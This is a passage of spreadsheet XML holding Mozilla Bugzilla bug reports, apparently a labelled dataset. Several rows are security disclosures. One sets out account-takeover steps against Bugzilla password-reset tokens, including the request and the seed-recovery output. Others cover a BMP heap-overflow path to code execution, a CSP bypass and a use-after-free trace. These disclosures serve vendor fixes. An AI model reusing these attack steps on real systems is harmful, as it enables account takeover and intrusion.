      <c r="V4493" t="n">
        <v>17</v>
      </c>
      <c r="W4493" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.1) Gecko/20040715 Debian/1.7.1-1
Build Identifier: 
As reported and fixed in bug 228917, comma operator for implicit JOIN is not DB
agnostic. In Bugzilla/Search.pm, there is another occurence, which should be
replaced by INNER JOIN. Patch follows.
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X4493" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4494">
      <c r="A4494" t="n">
        <v>1106596</v>
      </c>
      <c r="B4494" t="inlineStr">
        <is>
          <t>2014-12-01 10:22:23 -0800</t>
        </is>
      </c>
      <c r="C4494" t="inlineStr">
        <is>
          <t>heap-use-after-free at AppendElements</t>
        </is>
      </c>
      <c r="D4494" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:44 -0700</t>
        </is>
      </c>
      <c r="E4494" t="n">
        <v>1</v>
      </c>
      <c r="F4494" t="n">
        <v>1</v>
      </c>
      <c r="G4494" t="n">
        <v>3</v>
      </c>
      <c r="H4494" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4494" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4494" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K4494" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4494" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4494" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4494" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4494" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4494" t="inlineStr">
        <is>
          <t>[adv-main37+][adv-esr31.6+] "fixed" by blacklisting flump3dec in bug 981869</t>
        </is>
      </c>
      <c r="Q4494" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4494" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4494" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T4494" t="n">
        <v>1</v>
      </c>
      <c r="U4494" t="n">
        <v>0</v>
      </c>
      <c r="V4494" t="n">
        <v>47</v>
      </c>
      <c r="W4494" t="inlineStr">
        <is>
          <t>Created attachment 8530914
ff-uaf-AppendElements.mp3
ASan spots a heap use after free whenever the attached page, which plays an mp3 file, is opened. This happens at least in Linux when using recent tinderbox builds.
To reproduce, download ff-uaf-AppendElements.{html,mp3} and $ firefox ff-uaf-AppendElements.html.
==3278==ERROR: AddressSanitizer: heap-use-after-free on address 0x6210006b7cff at pc 0x7f83ba18da6e bp 0x7f837e9f15b0 sp 0x7f837e9f15a8
READ of size 9216 at 0x6210006b7cff thread T58 (Media Audio)
    #0 0x7f83ba18da6d in AppendElements /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/AudioStream.h:119
    #1 0x7f83ba18a951 in PlayFromAudioQueue /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/AudioSink.cpp:323
    #2 0x7f83ba18886b in AudioLoop /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/media/AudioSink.cpp:193
    #3 0x7f83ba1ae020 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/media/../../dist/include/nsThreadUtils.h:388
    #4 0x7f83b62b0804 in ProcessNextEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:830
    #5 0x7f83b630f83a in NS_ProcessNextEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #6 0x7f83b6b2b089 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:339
    #7 0x7f83b6ad82dc in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #8 0x7f83b62ad295 in ThreadFunc /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:350
    #9 0x7f83c3948405 in _pt_root /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:212
    #10 0x7f83c6e80181 in start_thread /build/buildd/eglibc-2.19/nptl/pthread_create.c:312 (discriminator 2)
    #11 0x7f83c5f72fbc in clone /build/buildd/eglibc-2.19/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:111</t>
        </is>
      </c>
      <c r="X4494" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4495">
      <c r="A4495" t="n">
        <v>880966</v>
      </c>
      <c r="B4495" t="inlineStr">
        <is>
          <t>2013-06-08 04:37:43 -0700</t>
        </is>
      </c>
      <c r="C4495" t="inlineStr">
        <is>
          <t>LiveSample are broken</t>
        </is>
      </c>
      <c r="D4495" t="inlineStr">
        <is>
          <t>2020-05-15 11:42:18 -0700</t>
        </is>
      </c>
      <c r="E4495" t="n">
        <v>1</v>
      </c>
      <c r="F4495" t="n">
        <v>1</v>
      </c>
      <c r="G4495" t="n">
        <v>6</v>
      </c>
      <c r="H4495" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4495" t="inlineStr">
        <is>
          <t>developer.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J4495" t="inlineStr">
        <is>
          <t>Editing</t>
        </is>
      </c>
      <c r="K4495" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4495" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4495" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N4495" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4495" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4495" t="inlineStr">
        <is>
          <t>[specification][type:bug]</t>
        </is>
      </c>
      <c r="Q4495" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4495" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4495" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4495" t="n">
        <v>1</v>
      </c>
      <c r="U4495" t="n">
        <v>0</v>
      </c>
      <c r="V4495" t="n">
        <v>3</v>
      </c>
      <c r="W4495" t="inlineStr">
        <is>
          <t>What did you do?
================
I add a live sample here https://developer.mozilla.org/en-US/docs/Online_and_offline_events
What happened?
==============
The Live sample is not visible because the src attribute of the iframe is empty (it tastes like a sanitation mistake)
At first I though it was because of the change made to the template on June 5 but some test show that it works properly and it's the iframe that is tainted at some deeper level.
What should have happened?
==========================
The src of the iframe should be populate and the live sample visible.
Is there anything else we should know?
======================================
If I try to reach the expected URL by hand, I get a "permission denied" page: https://mdn.mozillademos.org/en-US/docs/Online_and_offline_events$samples/Example?revision=426699 This is very, very odd (And maybe the true source of the issue).</t>
        </is>
      </c>
      <c r="X4495" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4496">
      <c r="A4496" t="n">
        <v>1423275</v>
      </c>
      <c r="B4496" t="inlineStr">
        <is>
          <t>2017-12-05 09:47:41 -0800</t>
        </is>
      </c>
      <c r="C4496" t="inlineStr">
        <is>
          <t>Switching mouse cursor from none to image hides the cursor globally on OSX</t>
        </is>
      </c>
      <c r="D4496" t="inlineStr">
        <is>
          <t>2018-11-05 14:10:21 -0800</t>
        </is>
      </c>
      <c r="E4496" t="n">
        <v>1</v>
      </c>
      <c r="F4496" t="n">
        <v>1</v>
      </c>
      <c r="G4496" t="n">
        <v>3</v>
      </c>
      <c r="H4496" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4496" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4496" t="inlineStr">
        <is>
          <t>Widget: Cocoa</t>
        </is>
      </c>
      <c r="K4496" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L4496" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4496" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4496" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4496" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4496" t="inlineStr">
        <is>
          <t>[adv-main58+]</t>
        </is>
      </c>
      <c r="Q4496" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4496" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4496" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T4496" t="n">
        <v>1</v>
      </c>
      <c r="U4496" t="n">
        <v>0</v>
      </c>
      <c r="V4496" t="n">
        <v>13</v>
      </c>
      <c r="W4496" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Steps to reproduce:
There is a jsFiddle here: https://jsfiddle.net/vb1ojdaL/
Summarizing here; on OSX El Capitan using Firefox 58 (and developer edition) when you have an element with `cursor: none` set and you toggle (via JS) it back to an image based cursor (base64 encoded) when there is another fallback cursor available the mouse cursor will become entirely invisible across all tabs/areas of firefox until you mouse over certain system areas (not sure exactly which cause it to reset).
I have tested with a GIF and PNG that both appear to function correctly in chrome and on firefox in windows and both are broken on OSX.
Here is the rule I initially discovered this bug with: 
cursor:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgBAMAAACBVGfHAAAAKlBMVEUAAAAzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMjZDADAAAADXRSTlMAYJ/vML9AEN/PUCBwo5BZ4wAAAGZJREFUKM9jQAFL1VH5jFctC1AEZBWcp6MouMTAYoQssAXIC0VWcNFZgekWsgm9Ika6AsgmMF10vohiBYOuCIoCBgaO26gKGHTRFDBdHFXAgK6A4RpUAUIATQHDnTRUBQx376IqAAB3TCfI3I+0DAAAAABJRU5ErkJggg==) 0 31,crosshair;
Actual results:
The mouse cursor becomes invisible across the entire page (and all tabs of firefox.
Expected results:
I would have expected the cursor to be visible as it is on other browsers/operating systems.</t>
        </is>
      </c>
      <c r="X4496" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4497">
      <c r="A4497" t="n">
        <v>619594</v>
      </c>
      <c r="B4497" t="inlineStr">
        <is>
          <t>2010-12-15 18:43:27 -0800</t>
        </is>
      </c>
      <c r="C4497" t="inlineStr">
        <is>
          <t>[SECURITY] Tokens generated from weak source of randomness, allowing an attacker to guess a password change token and change the password of any account</t>
        </is>
      </c>
      <c r="D4497" t="inlineStr">
        <is>
          <t>2024-05-29 15:47:11 -0700</t>
        </is>
      </c>
      <c r="E4497" t="n">
        <v>1</v>
      </c>
      <c r="F4497" t="n">
        <v>1</v>
      </c>
      <c r="G4497" t="n">
        <v>4</v>
      </c>
      <c r="H4497" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4497" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4497" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K4497" t="inlineStr">
        <is>
          <t>2.14</t>
        </is>
      </c>
      <c r="L4497" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4497" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4497" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4497" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4497" t="inlineStr">
        <is>
          <t>[infrasec:auth][ws:critical]</t>
        </is>
      </c>
      <c r="Q4497" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4497" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4497" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T4497" t="n">
        <v>1</v>
      </c>
      <c r="U4497" t="n">
        <v>0</v>
      </c>
      <c r="V4497" t="n">
        <v>184</v>
      </c>
      <c r="W4497" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101212 Gentoo Firefox/3.6.13
Build Identifier: Bugzilla-3.6.3, as well as the version running on bugzilla.mozilla.org
To Whom It May Concern,
the Bugzilla 3.6.3, the bugzilla.mozilla.org website, and likely other versions and instances of Bugzilla contain a critical vulnerability that can be used to recover a password reset token for any account. An attacker with an account on the bugzilla system can request a password reset for any other account and through efficient bruteforce recover the token, the attacker can use the token to changethe password of the victim's account and login as the victim.
A Quick explanation.
Bugzilla uses rand and srand in perl, which are based on srand48 and drand48 on Linux (and possibly other OS's) srand48 is seeded with at most 32 bit of entropy. Using a modern machine one can go through these 32bits in a very short amount of time, less than 10 minutes on my machine.
Bugzilla uses (s)rand to generate their tokens and to generate their login cookie. When accessing token.cgi with the attackers login credentials Bugzilla will login the attacker and send him a login cookie made using generate_random_password, the attacker can recover the seed used for srand from this, and use it to know the full internal state of the random number generator.
The same request is used by the attacker to request a password reset for the account the attackers wants to take over. For the reset procedure a token will be generated and send to the victim, if the attacker can find this token he can reset the victims password. Since the token is also created using generate_random_password and uses the internal random state that was left after making the login cookie the attacker can easily deduce the token send to the victim.
Steps for a succesful attack:
request a password reset for the victim account, while logging into to Bugzilla:
POST /token.cgi
---
Bugzilla_login=&lt;ATTACKER_LOGIN&gt;&amp;Bugzilla_password=&lt;ATTACKER_PASSWORD&gt;&amp;Bugzilla_remember=on&amp;loginname=&lt;VICTIMLOGINNAME&gt;&amp;a=reqpw
the response from the server will contain:
Set-Cookie: Bugzilla_logincookie=LPfN86mTdY; path=/; expires=Fri, 01-Jan-2038 00:00:00 GMT; secure; HttpOnly
while the victim will be sent an email with a token in it.
Next the attacker finds the random state used to generate his login Cookie and calculates the next token that BugZilla generated:
./randfindclean LPfN86mTdY
found at seed: -43631713 // fd663b9f
YKWG0y4oQT
(randfindclean finds the seed used to make the logincookie, and then calculates the token based on rand state)
and uses the token to login as the victim and change their password.
---- copy paste from the victims email ---
You have (or someone impersonating you has) requested to change your
Bugzilla password. To complete the change, visit the following link:
https://bugzilla.mozilla.org/token.cgi?t=YKWG0y4oQT&amp;a=cfmpw
-----
If there are any questions, please don't hesitate to contact me,
   Willem Pinckaers.
Reproducible: Always
Steps to Reproduce:
1.login while requestion a password change for the victim
2.based on logincookie, calculate the password token
3.change the victim password and login as the victim
Actual Results:  
Got access to the victim's account
Expected Results:  
r</t>
        </is>
      </c>
      <c r="X4497" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4498">
      <c r="A4498" t="n">
        <v>1452037</v>
      </c>
      <c r="B4498" t="inlineStr">
        <is>
          <t>2018-04-06 02:01:20 -0700</t>
        </is>
      </c>
      <c r="C4498" t="inlineStr">
        <is>
          <t>script-src 'sha256-47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=' security policy will whitelist all javascript: URIs</t>
        </is>
      </c>
      <c r="D4498" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:47 -0700</t>
        </is>
      </c>
      <c r="E4498" t="n">
        <v>1</v>
      </c>
      <c r="F4498" t="n">
        <v>1</v>
      </c>
      <c r="G4498" t="n">
        <v>3</v>
      </c>
      <c r="H4498" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4498" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4498" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K4498" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4498" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4498" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4498" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4498" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4498" t="inlineStr">
        <is>
          <t>[domsecurity-active][post-critsmash-triage][adv-main69+][adv-esr68.1+]</t>
        </is>
      </c>
      <c r="Q4498" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4498" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4498" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T4498" t="n">
        <v>1</v>
      </c>
      <c r="U4498" t="n">
        <v>0</v>
      </c>
      <c r="V4498" t="n">
        <v>10</v>
      </c>
      <c r="W4498" t="inlineStr">
        <is>
          <t>Created attachment 8965617
Proof of concept page
Note: This is likely related to bug 1314567 which I cannot access.
As implemented right now, execution of any javascript: URIs can be allowed using a hash-based source that takes the empty string as input. For example, script-src 'sha256-47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=' is supposed to allow empty &lt;script&gt; tags only but will enable arbitrary javascript: URIs as well. So specifying a source like this weakens CSP protection considerably which is not obvious.
You can reproduce by opening the attached proof of concept page and clicking the link. In Chrome 65 this doesn't do anything, the javascript: URI is blocked by CSP. In Firefox 59.0.2 and Firefox 61.0a1 (2018-04-04) nightly on the other hand the code executes and shows a message saying "clicked."
IMHO the issue is the code here:
&gt; https://dxr.mozilla.org/mozilla-central/rev/2f5ffe4fa2153a798ed8b310a597ea92abd1b868/dom/security/nsCSPContext.cpp#582
If aElementOrContent is neither a string nor an element (nullptr in this case) this code will leave content variable uninitialized (empty) but perform matching hash sources nevertheless.
I can see two ways how this can have a security impact:
1) A website might specify this script source assuming that it is innocuous (an empty script cannot do any harm). Not sure whether any real-world websites actually do this.
2) WebExtensions aren't allowed to specify unsafe-inline in their CSP for security reasons, meaning in particular that they aren't allowed to use javascript: URIs. This issue allows weakening the CSP protection nevertheless.</t>
        </is>
      </c>
      <c r="X4498" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4499">
      <c r="A4499" t="n">
        <v>639856</v>
      </c>
      <c r="B4499" t="inlineStr">
        <is>
          <t>2011-03-08 08:40:23 -0800</t>
        </is>
      </c>
      <c r="C4499" t="inlineStr">
        <is>
          <t>SeaMonkey needs access to DXSDK_Feb10.exe and newest hg updates</t>
        </is>
      </c>
      <c r="D4499" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4499" t="n">
        <v>1</v>
      </c>
      <c r="F4499" t="n">
        <v>1</v>
      </c>
      <c r="G4499" t="n">
        <v>5</v>
      </c>
      <c r="H4499" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4499" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4499" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4499" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4499" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4499" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4499" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4499" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4499" t="inlineStr"/>
      <c r="Q4499" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4499" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4499" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4499" t="n">
        <v>1</v>
      </c>
      <c r="U4499" t="n">
        <v>0</v>
      </c>
      <c r="V4499" t="n">
        <v>7</v>
      </c>
      <c r="W4499" t="inlineStr">
        <is>
          <t>SeaMonkey is looking to do an update on our windows builders, and to do so we need access to (many) of the OPSI files that are used by Firefox.
We do not yet have OPSI running, but we will be manually installing many of the OPSI updates that Firefox Builders now have. One of our main ones, that we feel is heavily needed is the DXSDK install, and as such we need at the least the DXSDK_Feb10.exe accessible to our builders somehow.
This was solved for the puppet-files by creating a mount on stage, /mnt/puppet-files/{production,staging} which we are able to use there.
We plan to release SeaMonkey 2.1 based on Firefox 4.0.1, and would even like the DirectX part fixed for b3 if possible, so this is relatively important to us.</t>
        </is>
      </c>
      <c r="X4499" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4500">
      <c r="A4500" t="n">
        <v>255067</v>
      </c>
      <c r="B4500" t="inlineStr">
        <is>
          <t>2004-08-10 12:57:21 -0700</t>
        </is>
      </c>
      <c r="C4500" t="inlineStr">
        <is>
          <t>BMP integer overflow exploits</t>
        </is>
      </c>
      <c r="D4500" t="inlineStr">
        <is>
          <t>2011-08-05 22:36:16 -0700</t>
        </is>
      </c>
      <c r="E4500" t="n">
        <v>1</v>
      </c>
      <c r="F4500" t="n">
        <v>1</v>
      </c>
      <c r="G4500" t="n">
        <v>3</v>
      </c>
      <c r="H4500" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4500" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4500" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K4500" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4500" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4500" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4500" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4500" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4500" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q4500" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4500" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4500" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4500" t="n">
        <v>1</v>
      </c>
      <c r="U4500" t="n">
        <v>0</v>
      </c>
      <c r="V4500" t="n">
        <v>32</v>
      </c>
      <c r="W4500" t="inlineStr">
        <is>
          <t>------------------------------------------------------------
Security Audit of Mozilla's .bmp image parsing (August 2004) 
by Gael Delalleau  &lt;gael.delalleau+moz@m4x.org&gt;
------------------------------------------------------------
Overview
--------
This report presents the results of a security audit of a part
of the Mozilla 1.7.2 C++ source code tree.
This security audit was done during my free time as an attempt
to promote and participate to the Mozilla Security Bug Bounty
Program (http://www.mozilla.org/security/bug-bounty.html).
Several integer overflows were found in the image parsing code
of Mozilla. Some of them leads to exploitable security bugs,
ranging from Denial of Service (crash of the Mozilla client)
to arbitrary code execution on the user's computer.
Source code files audited
-------------------------
mozilla/modules/libpr0n/decoders/bmp/nsBMPDecoder.cpp
mozilla/modules/libpr0n/decoders/bmp/nsBMPDecoder.h
+ parts of various related files
Details
-------
There are mutiple integer overflows in the code used to parse
and display .bmp images. Some of them leads to exploitable
security bugs.
These integer overflow can be found:
- in the .bmp decoder of the libpr0n module
- in the OS-specific code used to display images. For instance,
  the following file is used on Windows systems:
  mozilla/gfx/src/windows/nsImageWin.cpp
I will now highlight all the integer overflow issues
found during the audit, and try to show how these various
issues finally allow for arbitrary code execution.
(1) *** Denial Of Service while parsing a malformed .bmp
        image ***
Vulnerable systems: Linux, Windows XP
Other systems: untested
* in nsBMPDecoder.cpp line 287:
  mRow = new PRUint8[(mBIH.width*mBIH.bpp)/8 + 4];
mBIH.width*mBIH.bpp can wrap around and thus the allocated
buffer can be made very small. On Linux (Mozilla 1.7.2
developpement version) a negative value in the new[] operator
will crash the client (uncatched exception?)
Then mFrame-&gt;Init() is called, followed by NS_ENSURE_SUCESS,
which ensures some sanity checks on the height, width and bpp
of the image. However, these checks are not strict enough
(they do not prevent mBIH.width*mBIH.bpp from wrapping around).
~ Fortunately on systems using gtk to display images (like Linux)
an additional check is done in mImage-&gt;Init() which prevents
Mozilla to display the image if the width or height is greater
than 32767, thus preventing arbitrary code execution.
~ On Windows systems, there is no limit to the height and width
of the image. Denial of service and arbitrary code execution are
possible as shown below.
~ Other systems: untested.
* in nsImageWin.cpp line 160:
  mRowBytes = CalcBytesSpan(mBHead-&gt;biWidth);
with :
1498 nsImageWin :: CalcBytesSpan(PRUint32  aWidth)
1499 {
1500   PRInt32 spanBytes;
1503   spanBytes = (aWidth * mBHead-&gt;biBitCount) &gt;&gt; 5;
       (...)
1510   spanBytes &lt;&lt;= 2;
1513   return(spanBytes);
1514 }
aWidth * mBHead-&gt;biBitCount is actually similar to
mBIH.width*mBIH.bpp. It can wrap around, so mRowBytes
can be very small.
This value finds its way in nsBMPDecoder.cpp in the
mBpr variable, which is used in line 374 to allocate
a buffer (which can be very small due to the
integer wrap around we just explained):
  mDecoded = (PRUint8*)malloc(mBpr);
Thus at lines 420 to 428 we can end in a big loop
(lpos==width iterations) which writes bytes to memory
pointed by p, which is actually our small mDecoded
buffer:
421                         while (lpos &gt; 0) {
422                           SetPixel(d, p[2], p[1], p[0]);
423                           p += 2;
424                           --lpos;
425                           if (mBIH.bpp == 32)
426                             p++; // Padding byte
427                           ++p;
428                         }
The SetPixel function writes the 3 bytes to d and increments
d by 3. 
Thus, memory is being copied from the p buffer
allocated in the heap, to the mDecoded buffer allocated
later on the same heap. Both buffers can be made very small,
so the loop will soon copy a part of the heap to another part
of the heap.
Consequences:
~ the client will crash when this big loop reaches the end
of the allocated memory for the heap (write attempt to an
unmapped memory area).
~ it might be possible to trigger arbitrary code execution
if another thread uses the corrupted heap before the
crash happens, or if we can allocate enough memory on the same
heap to make it big enough to avoid the crash.
~ Consequences on systems other than Windows (32 bits): not
evaluated.
----------
Side Note: there are other suspicious pieces of code in
nsImageWin.cpp, without checks for integer overflows.
For instance at line 161:
  mSizeImage = mRowBytes * mBHead-&gt;biHeight;
  (...)
  mImageBits = new unsigned char[mSizeImage];
----------
(2) *** Arbitrary code execution while parsing a malformed .bmp
        image ***
Vulnerable: Windows XP
Not vulnerable (?): Linux
Other systems: untested
With the same bugs, there is a better way to corrupt the heap
after the mDecoded pointer with arbitrary values, and without
crashing the client.
Indeed, we can use a RLE-encoded bitmap image (depth 8 bits,
encoded with RLE8, width big enough to make mBpr wrap around,
small height to pass the overflow check on width*height. See
the sample image file attached to this report).
Line 464, the buffer is allocated (but too small!):
  mDecoded = (PRUint8*)calloc(mBpr, 1);
Then we can legitimately use the RLE decoder to write arbitrary
data in the mDecoded buffer, with the length limit being mBIH.width
which is a big value (much bigger than the size of the buffer).
Heap corruption with arbitrary data on the Windows OS is a common
situation, known to allow arbitrary code execution. See the two
screenshots showing a debugger attached to the mozilla.exe process after
the crash; they show that at least two exploitation techniques
may be used to get control of EIP and hijack the execution flow
of the program: 
  (a) overwriting C++ pointers to the methods of objects
stored on the heap. The screenshot shows that we can land in:
   CALL [EAX+10]   where EAX=0x42424242 (our arbitrary data)
  (b) using standard heap overflow techniques. The screenshot
shows that we can land in ntdll.dll in:
   MOV [ECX], EAX  where EAX and ECX are arbitrary values supplied
   by the attacker in the malicious image file.
---------
Side Note: in the RLE decoder of nsBMPDecoder.cpp at line 568,
there is: mDecoding += byte * GFXBYTESPERPIXEL;
This can be abused to put the mDecoding pointer out of the
bounds of the mDecoded buffer. Even though this does not seems
to be exploitable with the current surrounding code, it deserves
to be fixed.
---------
Exploit code
------------
I did not wrote the actual exploit code because:
- it is outside the scope of a source code audit
- I gave enough information to show such an exploit can be written.
The issue is just the same kind as many other heap overflow
vulnerabilities, including previous Mozilla vulnerabilities like the
SOAPParameter overflow (236618).
- in France, the legal status of publishing exploit code is unknown
at the moment.
Further audit work on the same topic
------------------------------------
- Need to check other image parsers (.jpeg, .gif, .ico, icon,
.xpm...) in libpr0n for integer overflows.
- Need to check deeper the OS-dependent image display code,
for all operating systems (I audited only small parts of
the gtk and Win Image code).</t>
        </is>
      </c>
      <c r="X4500" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4501">
      <c r="A4501" t="n">
        <v>1525267</v>
      </c>
      <c r="B4501" t="inlineStr">
        <is>
          <t>2019-02-05 05:28:50 -0800</t>
        </is>
      </c>
      <c r="C4501" t="inlineStr">
        <is>
          <t>FTP triggers undismissable auth prompts</t>
        </is>
      </c>
      <c r="D4501" t="inlineStr">
        <is>
          <t>2020-04-06 02:05:48 -0700</t>
        </is>
      </c>
      <c r="E4501" t="n">
        <v>1</v>
      </c>
      <c r="F4501" t="n">
        <v>1</v>
      </c>
      <c r="G4501" t="n">
        <v>2</v>
      </c>
      <c r="H4501" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4501" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4501" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4501" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4501" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4501" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4501" t="inlineStr">
        <is>
          <t>VERIFIED</t>
